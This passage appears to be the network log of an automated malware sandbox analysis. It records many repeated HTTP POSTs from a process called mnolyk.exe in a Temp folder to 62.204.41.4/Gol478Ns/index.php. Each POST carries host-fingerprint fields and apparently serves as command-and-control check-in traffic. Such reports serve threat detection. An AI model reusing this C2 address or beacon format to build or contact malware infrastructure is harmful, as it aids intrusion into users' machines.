                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:29.398273945 CET659INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      545192.168.2.75024062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:30.031559944 CET660OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:30.096462965 CET660INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      546192.168.2.75024162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:30.345221996 CET661OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:30.408487082 CET661INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      547192.168.2.75024262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:30.589447021 CET662OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:30.653734922 CET662INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      548192.168.2.75024362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:30.844573975 CET663OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:30.906086922 CET663INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      549192.168.2.75024462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:31.095484972 CET664OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:31.160924911 CET664INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      55192.168.2.74975062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:14.882616997 CET170OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:14.946597099 CET170INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      550192.168.2.75024562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:31.338382006 CET665OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:31.401182890 CET665INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      551192.168.2.75024662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:31.574487925 CET666OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:31.638185024 CET666INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      552192.168.2.75024762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:31.810489893 CET667OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:31.872325897 CET667INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      553192.168.2.75024862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:32.043751955 CET668OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:32.106208086 CET668INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      554192.168.2.75024962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:32.275895119 CET669OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:32.339564085 CET669INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      555192.168.2.75025062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:32.516212940 CET670OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:32.580764055 CET670INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      556192.168.2.75025162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:32.760946989 CET671OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:32.824388981 CET671INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      557192.168.2.75025262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:32.997462034 CET672OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:33.064398050 CET672INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      558192.168.2.75025362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:33.281755924 CET673OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:33.344080925 CET673INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      559192.168.2.75025462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:33.517905951 CET674OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:33.583132029 CET674INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      56192.168.2.74975162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:15.127197981 CET171OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:15.192442894 CET171INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      560192.168.2.75025562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:33.778377056 CET675OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:33.841334105 CET675INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      561192.168.2.75025662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:34.024543047 CET676OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:34.088280916 CET676INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
